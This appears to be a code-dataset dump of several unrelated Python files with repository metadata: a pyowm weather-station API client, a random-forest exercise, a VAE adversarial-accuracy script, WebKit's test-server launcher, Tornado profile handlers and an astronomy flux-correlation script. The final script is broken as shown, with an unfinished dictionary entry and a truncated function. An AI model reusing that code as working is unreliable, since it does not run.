"""
A manager objects that provides a full interface to OWM Stations API. Mainly
it implements CRUD methods on Station entities and the corresponding
measured datapoints.
:param API_key: the OWM web API key
:type API_key: str
:returns: a *StationsManager* instance
:raises: *AssertionError* when no API Key is provided
"""
def __init__(self, API_key):
assert API_key is not None, 'You must provide a valid API Key'
self.API_key = API_key
self.stations_parser = StationParser()
self.aggregated_measurements_parser = AggregatedMeasurementParser()
self.http_client = HttpClient()
def stations_api_version(self):
return STATIONS_API_VERSION
# STATIONS Methods
def get_stations(self):
"""
Retrieves all of the user's stations registered on the Stations API.
:returns: list of *pyowm.stationsapi30.station.Station* objects
"""
status, data = self.http_client.get_json(
STATIONS_URI,
params={'appid': self.API_key},
headers={'Content-Type': 'application/json'})
return [self.stations_parser.parse_dict(item) for item in data]
def get_station(self, id):
"""
Retrieves a named station registered on the Stations API.
:param id: the ID of the station
:type id: str
:returns: a *pyowm.stationsapi30.station.Station* object
"""
status, data = self.http_client.get_json(
NAMED_STATION_URI % str(id),
params={'appid': self.API_key},
headers={'Content-Type': 'application/json'})
return self.stations_parser.parse_dict(data)
def create_station(self, external_id, name, lat, lon, alt=None):
"""
Create a new station on the Station API with the given parameters
:param external_id: the user-given ID of the station
:type external_id: str
:param name: the name of the station
:type name: str
:param lat: latitude of the station
:type lat: float
:param lon: longitude of the station
:type lon: float
:param alt: altitude of the station
:type alt: float
:returns: the new *pyowm.stationsapi30.station.Station* object
"""
assert external_id is not None
assert name is not None
assert lon is not None
assert lat is not None
if lon < -180.0 or lon > 180.0:
raise ValueError("'lon' value must be between -180 and 180")
if lat < -90.0 or lat > 90.0:
raise ValueError("'lat' value must be between -90 and 90")
if alt is not None:
if alt < 0.0:
raise ValueError("'alt' value must not be negative")
status, payload = self.http_client.post(
STATIONS_URI,
params={'appid': self.API_key},
data=dict(external_id=external_id, name=name, lat=lat,
lon=lon, alt=alt),
headers={'Content-Type': 'application/json'})
return self.stations_parser.parse_dict(payload)
def update_station(self, station):
"""
Updates the Station API record identified by the ID of the provided
*pyowm.stationsapi30.station.Station* object with all of its fields
:param station: the *pyowm.stationsapi30.station.Station* object to be updated
:type station: *pyowm.stationsapi30.station.Station*
:returns: `None` if update is successful, an exception otherwise
"""
assert station.id is not None
status, _ = self.http_client.put(
NAMED_STATION_URI % str(station.id),
params={'appid': self.API_key},
data=dict(external_id=station.external_id, name=station.name,
lat=station.lat, lon=station.lon, alt=station.alt),
headers={'Content-Type': 'application/json'})
def delete_station(self, station):
"""
Deletes the Station API record identified by the ID of the provided
*pyowm.stationsapi30.station.Station*, along with all its related
measurements
:param station: the *pyowm.stationsapi30.station.Station* object to be deleted
:type station: *pyowm.stationsapi30.station.Station*
:returns: `None` if deletion is successful, an exception otherwise
"""
assert station.id is not None
status, _ = self.http_client.delete(
NAMED_STATION_URI % str(station.id),
params={'appid': self.API_key},
headers={'Content-Type': 'application/json'})
# Measurements-related methods
def send_measurement(self, measurement):
"""
Posts the provided Measurement object's data to the Station API.
:param measurement: the *pyowm.stationsapi30.measurement.Measurement*
object to be posted
:type measurement: *pyowm.stationsapi30.measurement.Measurement* instance
:returns: `None` if creation is successful, an exception otherwise
"""
assert measurement is not None
assert measurement.station_id is not None
status, _ = self.http_client.post(
MEASUREMENTS_URI,
params={'appid': self.API_key},
data=[self._structure_dict(measurement)],
headers={'Content-Type': 'application/json'})
def send_measurements(self, list_of_measurements):
"""
Posts data about the provided list of Measurement objects to the
Station API. The objects may be related to different station IDs.
:param list_of_measurements: list of *pyowm.stationsapi30.measurement.Measurement*
objects to be posted
:type list_of_measurements: list of *pyowm.stationsapi30.measurement.Measurement*
instances
:returns: `None` if creation is successful, an exception otherwise
"""
assert list_of_measurements is not None
assert all([m.station_id is not None for m in list_of_measurements])
msmts = [self._structure_dict(m) for m in list_of_measurements]
status, _ = self.http_client.post(
MEASUREMENTS_URI,
params={'appid': self.API_key},
data=msmts,
headers={'Content-Type': 'application/json'})
def get_measurements(self, station_id, aggregated_on, from_timestamp,
to_timestamp, limit=100):
"""
Reads measurements of a specified station recorded in the specified time
window and aggregated on minute, hour or day. Optionally, the number of
resulting measurements can be limited.
:param station_id: unique station identifier
:type station_id: str
:param aggregated_on: aggregation time-frame for this measurement
:type aggregated_on: string between 'm','h' and 'd'
:param from_timestamp: Unix timestamp corresponding to the beginning of
the time window
:type from_timestamp: int
:param to_timestamp: Unix timestamp corresponding to the end of the
time window
:type to_timestamp: int
:param limit: max number of items to be returned. Defaults to 100
:type limit: int
:returns: list of *pyowm.stationsapi30.measurement.AggregatedMeasurement*
objects
"""
assert station_id is not None
assert aggregated_on is not None
assert from_timestamp is not None
assert from_timestamp > 0
assert to_timestamp is not None
assert to_timestamp > 0
if to_timestamp < from_timestamp:
raise ValueError("End timestamp can't be earlier than begin timestamp")
assert isinstance(limit, int)
assert limit >= 0
query = {'appid': self.API_key,
'station_id': station_id,
'type': aggregated_on,
'from': from_timestamp,
'to': to_timestamp,
'limit': limit}
status, data = self.http_client.get_json(
MEASUREMENTS_URI,
params=query,
headers={'Content-Type': 'application/json'})
return [self.aggregated_measurements_parser.parse_dict(item) for item in data]
def send_buffer(self, buffer):
"""
Posts to the Stations API data about the Measurement objects contained
into the provided Buffer instance.
:param buffer: the *pyowm.stationsapi30.buffer.Buffer* instance whose
measurements are to be posted
:type buffer: *pyowm.stationsapi30.buffer.Buffer* instance
:returns: `None` if creation is successful, an exception otherwise
"""
assert buffer is not None
msmts = [self._structure_dict(m) for m in buffer.measurements]
status, _ = self.http_client.post(
MEASUREMENTS_URI,
params={'appid': self.API_key},
data=msmts,
headers={'Content-Type': 'application/json'})
def _structure_dict(self, measurement):
d = measurement.to_dict()
item = dict()
item['station_id'] = d['station_id']
item['dt'] = d['timestamp']
item['temperature'] = d['temperature']
item['wind_speed'] = d['wind_speed']
item['wind_gust'] = d['wind_gust']
item['wind_deg'] = d['wind_deg']
item['pressure'] = d['pressure']
item['humidity'] = d['humidity']
item['rain_1h'] = d['rain_1h']
item['rain_6h'] = d['rain_6h']
item['rain_24h'] = d['rain_24h']
item['snow_1h'] = d['snow_1h']
item['snow_6h'] = d['snow_6h']
item['snow_24h'] = d['snow_24h']
item['dew_point'] = d['dew_point']
item['humidex'] = d['humidex']
item['heat_index'] = d['heat_index']
item['visibility_distance'] = d['visibility_distance']
item['visibility_prefix'] = d['visibility_prefix']
item['clouds'] = [dict(distance=d['clouds_distance']),
dict(condition=d['clouds_condition']),
dict(cumulus=d['clouds_cumulus'])]
item['weather'] = [
dict(precipitation=d['weather_precipitation']),
dict(descriptor=d['weather_descriptor']),
dict(intensity=d['weather_intensity']),
dict(proximity=d['weather_proximity']),
dict(obscuration=d['weather_obscuration']),
dict(other=d['weather_other'])]
return item | [
"[email protected]"
] | |
ab360bec8cf99a92bbc1598f7170bfff77391d5f | d866c0dca34a7ce98bf6c965ee54bcb6f6042f33 | /source/week_5_part_1.py | 4dc3b8ac477ae5b804297312dd66f8ef296ac3dd | [] | no_license | RasselJohn/ML | 0b8acf57602a484a30aa51d57c2286c65944c8e8 | a3742176e73fd7329639ce1a86582a79f2634e81 | refs/heads/master | 2021-08-02T07:20:25.474284 | 2021-07-25T11:56:41 | 2021-07-25T11:56:41 | 146,184,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | # Композиция алгоритмов
# Случайный лес
# Регрессия
import pandas
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import KFold, cross_val_score
from source import create_answer_file
data = pandas.read_csv(r'..\data\abalone.csv')
# приводим поле к числовому виду
data['Sex'] = data['Sex'].map(lambda x: 1 if x == 'M' else (-1 if x == 'F' else 0))
X = data[[col for col in data.columns if col != 'Rings']]
y = data['Rings']
for estimators_count in range(1, 51):
clf = RandomForestRegressor(n_estimators=estimators_count, random_state=1)
clf.fit(X, y)
k_fold = KFold(n_splits=5, shuffle=True, random_state=1)
scores = cross_val_score(clf, X, y, cv=k_fold, scoring='r2')
if scores.mean() > 0.52:
create_answer_file('w5_1.txt', f'{estimators_count}')
break
| [
"Rassel"
] | Rassel |
1659481855f03de945b35b46a831242522f624fe | 8698757521458c2061494258886e5d3cdfa6ff11 | /core/adversarial/accuracy_repeated_reconstructions.py | e5a3818ba69a8a7afb6c10a7dea992487a9635d7 | [
"MIT"
] | permissive | ricvo/argo | 546c91e84d618c4bc1bb79a6bc7cba01dca56d57 | a10c33346803239db8a64c104db7f22ec4e05bef | refs/heads/master | 2023-02-25T01:45:26.412280 | 2020-07-05T22:55:35 | 2020-07-05T22:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,330 | py | import numpy as np
import tensorflow as tf
import pdb
import argparse
from tensorflow.examples.tutorials.mnist import input_data
from datasets.Dataset import Dataset
from core.argo.core.ArgoLauncher import ArgoLauncher, get_full_id
from core.argo.core.TrainingLauncher import TrainingLauncher
from core.argo.core.TFDeepLearningModel import load_model, load_network
from vae.core.VAE import GaussianVariationalAutoEncoder
from prediction.core.PredictionModel import get_prediction_model
import os
# os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
# os.environ["CUDA_VISIBLE_DEVICES"]='2'
# sess_config = tf.ConfigProto()
# sess_config.gpu_options.allow_growth=True
parser = argparse.ArgumentParser(description='Compute accuracy of repeated reconstructions through VAE', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('model_choice', help = 'The model to use as classifier; choose between: ff, vaeffnos, vaeffs, vffnos, vffs')
parser.add_argument('ffconffile', help = 'The config file associated to the training of the Prediction model to load.')
parser.add_argument('folder_to_load', help = 'The folder where the reconstructions are saved')
parser.add_argument('--data_rank', '-rk', help = 'The tensor rank of data; rk = 2 for MLP, rk = 4 for Conv.', default = 4)
parser.add_argument('--autoencconffile', '-ae', help = 'The config file associated to the training of the autoencoder model to load.', default = None)
parser.add_argument('--global_step_vae', help = 'The global_step at which we want to restore VAE model. Default is the last one found in the folder.', default=None)
parser.add_argument('--global_step_ff', help = 'The global_step at which we want to restore Prediction model. Default is the last one found in the folder.', default=None)
parser.add_argument('--gpu', '-gpu', help = 'GPU where to run on.', default = '0')
args = parser.parse_args()
model_choice = args.model_choice
ffconffile = args.ffconffile
folder_to_load = args.folder_to_load
data_rank = int(args.data_rank)
autoencconffile = args.autoencconffile
global_step_vae = args.global_step_vae
global_step_ff = args.global_step_ff
gpu = args.gpu
seed = 120
parallelism = 0 # 0 is equivalent to single
###################
### SOME CHECKS ###
###################
# FF has: logits
# VAEFF has: mean, cov, reconstr, logits
# VFF has: mean, cov, logits
if(model_choice not in ['ff', 'vaeffnos', 'vaeffs', 'vffnos', 'vffs']):
raise ValueError("Choose a correct model!")
if(model_choice[0] == 'v'):
if(autoencconffile is None):
raise ValueError("Either you chose the wrong model or you didn't specify an autoencoder conf file!")
if(model_choice[0] == 'f'):
if(autoencconffile is not None):
raise ValueError("FF requires no autoencoder!")
###################
## LOAD DATASETS ##
###################
ffmodeldir = os.path.dirname(ffconffile)
ff_dataset_conf, ff_model_parameters, ff_config = ArgoLauncher.process_conf_file(args.ffconffile)
ff_dataset = Dataset.load_dataset(ff_dataset_conf)
if(model_choice[0] == 'v'): #i.e. there is a VAE model
vaemodeldir = os.path.dirname(autoencconffile)
vae_dataset_conf, vae_model_parameters, vae_config = ArgoLauncher.process_conf_file(args.autoencconffile)
vae_dataset = Dataset.load_dataset(vae_dataset_conf)
#if datasets x_shape are different raise Exception! what is the meaning of a comparison otherwise?
assert ff_dataset.x_shape == vae_dataset.x_shape, \
"the VAE and FF network that you are trying to load have been \
trained on datasets with different x_shape : `%s` and `%s`"%(str(ff_dataset.x_shape), str(vae_dataset.x_shape))
x_shape = (None,) + ff_dataset.x_shape
mnist = input_data.read_data_sets("MNIST_data", one_hot=True)
X_train = np.copy(mnist.train.images) #copy the dataset because it will be shuffled afterwards
y_train = np.copy(mnist.train.labels)
X_test = np.copy(mnist.test.images)
y_test = np.copy(mnist.test.labels)
# Load the 10 datasets
X_np = np.zeros((10, 10000, 784), dtype = 'float32')
for i in range(10):
X_np[i] = np.load(folder_to_load + "no" + str(i+1) + ".npy")
if(data_rank == 4):
X_np = X_np.reshape((10, 10000, 28, 28, 1))
################################
## VAE MODEL, GET VAE NETWORK ##
################################
#TODO maybe train here if it has not been trained... ?
# launcher = TrainingLauncher(ModelClass, dataset)
# launcher.run(model_parameters, config, parallelism)
if(model_choice[0] == 'v'): #i.e. there is a VAE model
vae_run = vae_model_parameters["run"]
vae_seed = vae_model_parameters["seed"]
vae_network, vae_checkpoint_name = load_network(GaussianVariationalAutoEncoder, autoencconffile, global_step_vae)
######################################
## PREDICTION MODEL, GET FF NETWORK ##
######################################
#TODO as above, maybe make training.. check if works.. ?
# launcher = TrainingLauncher(ModelClass, dataset)
# launcher.run(model_parameters, config, parallelism)
ff_run = ff_model_parameters["run"]
ff_seed = ff_model_parameters["seed"]
ff_task = ff_model_parameters["task"]
ff_network, ff_checkpoint_name = load_network(get_prediction_model, ffconffile, global_step_ff)
##############################
## SESSION AND CALCULATIONS ##
##############################
# SET THE SEED
tf.set_random_seed(seed)
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = gpu
sess_config = tf.ConfigProto()
sess_config.gpu_options.allow_growth = True
sess = tf.Session(config = sess_config)
x = tf.placeholder(tf.float32, shape=x_shape, name='input')
# LOAD FF NETWORK
logits = ff_network(x)
ff_network.restore(sess, ff_checkpoint_name)
# LOAD VAE NETWORK
if(model_choice[0] == 'v'): #i.e. there is a VAE model
# LOAD VAE NETWORK
model_latent, _, model_visible = vae_network(x)
vae_network.restore(sess, vae_checkpoint_name)
n_z_samples = vae_network.n_z_samples
# CALLABLES FOR CLEVERHANS
encoder_module = vae_network.encoder_module
decoder_module = vae_network.decoder_module
# CALLABLES FOR CLEVERHANS
ff_module = ff_network.module
##############################
###### DEFINE THE MODELS #####
##############################
def ff(x):
logits = ff_module(x)
return logits, None
def vae_ff_nos(x):
model_latent = encoder_module(x)
mean = model_latent.mean()
rec_distr = decoder_module(mean)
recnode = rec_distr.reconstruction_node()
logits = ff_module(recnode)
return logits, mean, _, recnode # "_" was originally "cov"
def vae_ff_s(x):
model_latent = encoder_module(x)
mean = model_latent.mean()
std = model_latent.scale
cov = tf.square(std)
distr = tf.distributions.Normal(loc = mean, scale = std)
samples = distr.sample(1); samples = tf.reshape(samples, (10000, 20))
rec_distr = decoder_module(samples)
recnode = rec_distr.reconstruction_node()
logits = ff_module(recnode)
return logits, mean, cov, recnode
def v_ff_nos(x):
model_latent = encoder_module(x)
mean = model_latent.mean()
cov = model_latent.covariance()
logits = ff_module(mean)
return logits, mean, cov
def v_ff_s(x):
model_latent = encoder_module(x)
mean = model_latent.mean()
cov = model_latent.covariance()
distr = tf.distributions.Normal(loc = mean, scale = cov)
samples = distr.sample(1)
logits = ff_module(samples)
return logits, mean, cov
# Set the model function according to our choice
if(model_choice == 'ff'):
model_function = ff
elif(model_choice == 'vaeffnos'):
model_function = vae_ff_nos
elif(model_choice == 'vaeffs'):
model_function = vae_ff_s
elif(model_choice == 'vffnos'):
model_function = v_ff_nos
elif(model_choice == 'vffs'):
model_function = v_ff_s
# Compute the 10 accuracy numbers
y_tf = tf.constant(y_test)
accuracy_np = [0. for i in range(10)]
for i in range(10):
X_tf = tf.constant(X_np[i])
pdb.set_trace()
logits_X_tf = model_function(X_tf)[0]
accuracy = tf.reduce_mean(tf.cast(
tf.equal(tf.argmax(logits_X_tf, axis = 1),
tf.cast(tf.argmax(y_tf, axis = 1), dtype = tf.int64)),
dtype = tf.float32))
accuracy_np[i] = accuracy.eval(session = sess)
print("Accuracy array:", accuracy_np)
| [
"[email protected]"
] | |
3653a5d7e910e73b48d90c9bbccb57a8c8c80049 | 16dbd5e49d52b675f820f20019bd7a052f125a43 | /Tools/Scripts/webkitpy/layout_tests/servers/web_platform_test_server.py | 332c3c32f71fe28fd028f8c5b9e5ec114eb650f3 | [
"BSD-3-Clause"
] | permissive | steveorsomethin/webkit | 614bec0948a7e6a3ecf488e7501b9ac7fa6d9154 | 26fff3c477cee750ae7d5a03263070e98b514398 | refs/heads/master | 2023-05-27T00:22:59.895565 | 2015-02-25T01:43:42 | 2015-02-25T01:43:42 | 31,293,548 | 1 | 0 | null | 2015-02-25T02:34:11 | 2015-02-25T02:34:10 | null | UTF-8 | Python | false | false | 8,458 | py | # Copyright (c) 2014, Canon Inc. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Canon Inc. nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY CANON INC. AND ITS CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL CANON INC. AND ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import logging
import sys
import time
from webkitpy.common.system.autoinstall import AutoInstaller
from webkitpy.layout_tests.servers import http_server_base
_log = logging.getLogger(__name__)
def doc_root(port_obj):
doc_root = port_obj.get_option("wptserver_doc_root")
if doc_root is None:
return port_obj.host.filesystem.join("imported", "w3c", "web-platform-tests")
return doc_root
def base_url(port_obj):
config_wk_filepath = port_obj.path_from_webkit_base("LayoutTests", "imported", "w3c", "resources", "config.json")
if not port_obj.host.filesystem.isfile(config_wk_filepath):
# This should only be hit by webkitpy unit tests
_log.debug("No WPT config file found")
return "http://localhost:8800/"
json_data = port_obj._filesystem.read_text_file(config_wk_filepath)
config = json.loads(json_data)
ports = config["ports"]
return "http://" + config["host"] + ":" + str(ports["http"][0]) + "/"
class WebPlatformTestServer(http_server_base.HttpServerBase):
def __init__(self, port_obj, name, layout_test_results_dir, pidfile=None):
http_server_base.HttpServerBase.__init__(self, port_obj)
self._output_dir = layout_test_results_dir
self._name = name
self._log_file_name = '%s_process_log.out.txt' % (self._name)
self._wsout = None
self._process = None
self._pid_file = pidfile
if not self._pid_file:
self._pid_file = self._filesystem.join(self._runtime_path, '%s.pid' % self._name)
self._servers_file = self._filesystem.join(self._runtime_path, '%s_servers.json' % (self._name))
self._stdout_data = None
self._stderr_data = None
self._filesystem = port_obj.host.filesystem
self._layout_root = port_obj.path_from_webkit_base("LayoutTests")
self._doc_root = self._filesystem.join(self._layout_root, doc_root(port_obj))
self._resources_files_to_copy = ['testharness.js', 'testharness.css', 'testharnessreport.js']
current_dir_path = self._filesystem.abspath(self._filesystem.split(__file__)[0])
self._start_cmd = ["python", self._filesystem.join(current_dir_path, "web_platform_test_launcher.py"), self._servers_file]
self._doc_root_path = port_obj.path_from_webkit_base("LayoutTests", self._doc_root)
def _install_modules(self):
modules_file_path = self._filesystem.join(self._layout_root, "imported", "w3c", "resources", "WPTModules")
if not self._filesystem.isfile(modules_file_path):
_log.warning("Cannot read " + modules_file_path)
return
modules = json.loads(self._filesystem.read_text_file(modules_file_path))
for module in modules:
AutoInstaller(target_dir=self._filesystem.join(self._doc_root, module["path"])).install(url=module["url"], url_subpath=module["url_subpath"], target_name=module["name"])
def _copy_webkit_test_files(self):
_log.debug('Copying WebKit resources files')
for f in self._resources_files_to_copy:
webkit_filename = self._filesystem.join(self._layout_root, "resources", f)
if self._filesystem.isfile(webkit_filename):
self._filesystem.copyfile(webkit_filename, self._filesystem.join(self._doc_root, "resources", f))
_log.debug('Copying WebKit web platform server config.json')
config_wk_filename = self._filesystem.join(self._layout_root, "imported", "w3c", "resources", "config.json")
if self._filesystem.isfile(config_wk_filename):
self._filesystem.copyfile(config_wk_filename, self._filesystem.join(self._doc_root, "config.json"))
def _clean_webkit_test_files(self):
_log.debug('Cleaning WPT resources files')
for f in self._resources_files_to_copy:
wpt_filename = self._filesystem.join(self._doc_root, "resources", f)
if self._filesystem.isfile(wpt_filename):
self._filesystem.remove(wpt_filename)
_log.debug('Cleaning WPT web platform server config.json')
config_wpt_filename = self._filesystem.join(self._doc_root, "config.json")
if self._filesystem.isfile(config_wpt_filename):
self._filesystem.remove(config_wpt_filename)
def _prepare_config(self):
if self._filesystem.exists(self._output_dir):
output_log = self._filesystem.join(self._output_dir, self._log_file_name)
self._wsout = self._filesystem.open_text_file_for_writing(output_log)
self._install_modules()
self._copy_webkit_test_files()
def _spawn_process(self):
self._stdout_data = None
self._stderr_data = None
if self._wsout:
self._process = self._executive.popen(self._start_cmd, cwd=self._doc_root_path, shell=False, stdin=self._executive.PIPE, stdout=self._wsout, stderr=self._wsout)
else:
self._process = self._executive.popen(self._start_cmd, cwd=self._doc_root_path, shell=False, stdin=self._executive.PIPE, stdout=self._executive.PIPE, stderr=self._executive.STDOUT)
self._filesystem.write_text_file(self._pid_file, str(self._process.pid))
# Wait a second for the server to actually start so that tests do not start until server is running.
time.sleep(1)
return self._process.pid
def _stop_running_subservers(self):
if self._filesystem.exists(self._servers_file):
try:
json_data = self._filesystem.read_text_file(self._servers_file)
started_servers = json.loads(json_data)
for server in started_servers:
if self._executive.check_running_pid(server['pid']):
_log.warning('Killing server process (protocol: %s , port: %d, pid: %d).' % (server['protocol'], server['port'], server['pid']))
self._executive.kill_process(server['pid'])
finally:
self._filesystem.remove(self._servers_file)
def stop(self):
super(WebPlatformTestServer, self).stop()
# In case of orphaned pid, kill the running subservers if any still alive.
self._stop_running_subservers()
def _stop_running_server(self):
_log.debug('Stopping %s server' % (self._name))
self._clean_webkit_test_files()
if self._process:
(self._stdout_data, self._stderr_data) = self._process.communicate(input='\n')
if self._wsout:
self._wsout.close()
self._wsout = None
if self._pid and self._executive.check_running_pid(self._pid):
_log.warning('Cannot stop %s server normally.' % (self._name))
_log.warning('Killing server launcher process (pid: %d).' % (self._pid))
self._executive.kill_process(self._pid)
self._remove_pid_file()
self._stop_running_subservers()
| [
"[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc"
] | [email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc |
f3d14c4f37f3d61fb7bc19b05ed9d7953bdf6a1e | b4c2fafa90b7775d38581473e7b792999b8037f1 | /handlers/Profile.py | b8e24986caf35e34ec44aeae94aa6642f7607150 | [] | no_license | DamonJie/ihome | 126f84c6f5587d9f65295cc293e392e649bada17 | 8db1ed8441c01f4cfaeb383f311900e2c1ec71bf | refs/heads/master | 2020-04-12T15:39:14.772918 | 2018-12-20T14:43:52 | 2018-12-20T14:43:52 | 162,582,916 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,932 | py | import logging
import constants
from handlers.BaseHandler import BaseHandler
from utils.response_code import RET
from utils.qiniu_storage import storage
from utils.commons import required_login
class ProfileHandler(BaseHandler):
"""个人信息"""
@required_login
def get(self):
user_id = self.session.data['user_id']
try:
ret = self.db.get_one("select up_name,up_mobile,up_avatar from ih_user_profile where up_user_id=%s", user_id)
except Exception as e:
logging.error(e)
return self.write({"errcode":RET.DBERR, "errmsg":"get data error"})
if ret[2]:
img_url = constants.QINIU_URL_PREFIX + ret[2]
else:
img_url = None
self.write({"errcode":RET.OK, "errmsg":"OK",
"data":{"user_id":user_id, "name":ret[0], "mobile":ret[1], "avatar":img_url}})
class NameHandler(BaseHandler):
@required_login
def post(self):
user_id=self.session.data["user_id"]
name=self.json_args.get("name")
if name in (None,""):
return self.write({"errcode":RET.PARAMERR,"errmsg":"params error"})
try:
self.db.update("update ih_user_profile set up_name=%s where up_user_id=%s",(name,user_id))
except Exception as e:
logging.error(e)
return self.write({"errcode":RET.DBERR,"errmsg":"name has exist"})
self.session.data["name"]=name
try:
self.session.save()
except Exception as e:
logging.error(e)
self.write({"errcode":RET.OK,"errmsg":"OK"})
class AvatarHandler(BaseHandler):
@required_login
def post(self):
files=self.request.files.get("avatar")
if not files:
return self.write(dict(errcode=RET.PARAMERR,errmsg="未传图片"))
avatar=files[0]["body"]
try:
file_name=storage(avatar)
except Exception as e:
logging.error(e)
return self.write(dict(error=RET.THIRDERR,errmsg="上传失败"))
# 从session数据中取出user_id
user_id = self.session.data["user_id"]
# 保存图片名(即图片url)到数据中
sql = "update ih_user_profile set up_avatar=%s where up_user_id=%s"
try:
row_count = self.db.update(sql, (file_name,user_id))
except Exception as e:
logging.error(e)
return self.write(dict(errcode=RET.DBERR, errmsg="保存错误"))
self.write(dict(errcode=RET.OK, errmsg="保存成功", data="%s%s" % (constants.QINIU_URL_PREFIX, file_name)))
class AuthHandler(BaseHandler):
@required_login
def get(self):
user_id=self.session.data["user_id"]
try:
ret=self.db.get_one("select up_real_name,up_id_card from ih_user_profile where up_user_id=%s",(user_id,))
except Exception as e:
logging.error(e)
return self.write({"errcode":RET.DBERR,"errmsg":"get data failed"})
logging.debug(ret)
if not ret:
return self.write({"errrcode":RET.NODATA,"errmsg":"no data"})
self.write({"errcode":RET.OK,"errmsg":"OK","data":{"real_name":ret[0],"id_card":ret[1]}})
@required_login
def post(self):
user_id = self.session.data["user_id"]
real_name = self.json_args.get("real_name")
id_card = self.json_args.get("id_card")
if real_name in (None, "") or id_card in (None, ""):
return self.write({"errcode": RET.PARAMERR, "errmsg": "params error"})
# 判断身份证号格式
try:
self.db.update("update ih_user_profile set up_real_name=%s,up_id_card=%s where up_user_id=%s",(real_name, id_card, user_id))
except Exception as e:
logging.error(e)
return self.write({"errcode": RET.DBERR, "errmsg": "update failed"})
self.write({"errcode": RET.OK, "errmsg": "OK"}) | [
"[email protected]"
] | |
b195df519818411291df92af9e17a1398789bfd5 | c155d27bf74255b8315603518c5ab76d0638dfea | /uv/serpens/flux_correlation_CN_HCN_log_Jy_v2.py | 749360d463819d4bdba2436ddab099aedfe9d64d | [] | no_license | amirocha/doktorat | 406c2e4476a5a22c863c37eb5f581a369800e936 | 22c90228f6bca9d0b116c73457b7e86ae4462167 | refs/heads/master | 2021-07-05T14:18:26.324886 | 2020-08-03T19:28:50 | 2020-08-03T19:28:50 | 152,316,686 | 0 | 0 | null | 2020-04-03T20:22:37 | 2018-10-09T20:28:29 | Python | UTF-8 | Python | false | false | 4,578 | py | """Flux correlation"""
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats as stat
import math as m
from scipy.stats import linregress as regr
DIST=436. #Ortiz-Leon 2017
L_sun = 3.86e26 #W
freq = {'CN': 113490985000, 'HCN': }
c = 299792458 # m/s
k = 1.38e-23 #Boltzmann constant [J/K]
conversion_factor = {3: 22, 2: 29} #, 1.3: 35, 0.8: 45} #[mm]:[Jy/K] from http://www.iram.fr/GENERAL/calls/s14/s14.pdf?fbclid=IwAR3_XqJE1cvy86ppQbSpXS1xAJ4F2sUjevWGDx1Nr78-rdNkUIDksY7f3n8
def read_data(filename):
file = open(filename,'r')
data = file.readlines()
file.close()
return data
def write_data(end_filename, data, slope, intercept, pearson, stderr):
file = open(end_filename,'w')
for SMM, CN, HCN in data:
file.write(f'{SMM:10.5} {CN:10.5} {HCN:10.5}\n')
file.write(f'\n slope:{slope:10.5} intercept:{intercept:10.5} stderr:{stderr:10.5} pearson:{pearson:10.5}\n')
file.close()
def create_flux_list(data):
fluxes = []
for i in range(1,len(data)):
line = data[i].split()
previous_line = data[i-1].split()
if line[1] == 'hcn10' and previous_line[1] == 'cn10':
fluxes.append((line[0], float(previous_line[2]), float(line[2]), float(data[i+1].split()[2]))) # source CNflux, HCNflux, CSflux
return fluxes
def plot_correlation(x, y, a, b, pearson):
Y = [elem*a+b for elem in x]
fig = plt.figure(1)
ax = fig.add_subplot(111)
ax.set_ylabel(r"$L_{\mathrm{CN}}$ [L$_\odot$]")
ax.set_xlabel(r"$L_{\mathrm{HCN}}$ [L$_\odot$]")
major_ticks_x = np.arange(-1, 2, 0.5)
major_ticks_y = np.arange(-6, -5, 0.1)
ax.set_xticks(major_ticks_x)
ax.set_yticks(major_ticks_y)
sources_list=['SMM8','SMM5','SMM2','SMM4','SMM12','SMM10','SMM3','SMM9','SMM6','SMM1'] #Lbol increasing
for i in range(len(sources_list)):
if i ==4:
ax.text(x[i]+0.02, y[i]-0.02, 'SMM12')
elif i == 0:
ax.text(x[i]+0.02, y[i], 'SMM8')
else:
ax.text(x[i]+0.02, y[i], sources_list[i])
ax.text(0.05, 1.05, 'Pearson coefficient = '+str(pearson) , transform=ax.transAxes, fontsize=14,
verticalalignment='bottom')
plt.plot(x, y, 'r.', ms=4.9)
plt.plot(x, Y, 'k-', linewidth=0.5)
plt.savefig('CN_HCN_correlation_log', format='eps')
plt.close()
def calculate_pearson(x, y):
pearson = stat.pearsonr(x, y)
print(pearson)
return pearson[0]
def fit_linear_regression(x, y):
slope, intercept, r_value, p_value, stderr = stat.linregress(x,y)
print(slope, intercept, r_value, p_value, stderr)
return slope, intercept, stderr
def sort_points(list_to_sort, other_list):
if len(list_to_sort) != len(other_list):
raise
